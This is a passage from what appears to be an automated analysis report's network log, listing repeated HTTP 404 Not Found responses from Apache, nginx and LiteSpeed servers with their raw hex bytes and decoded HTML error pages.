http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:34:14 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:34:17 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 07:34:19 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 07:34:36 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 07:34:39 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 07:34:42 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 07:35:05 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 07:35:07 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 07:35:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 07:35:13 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 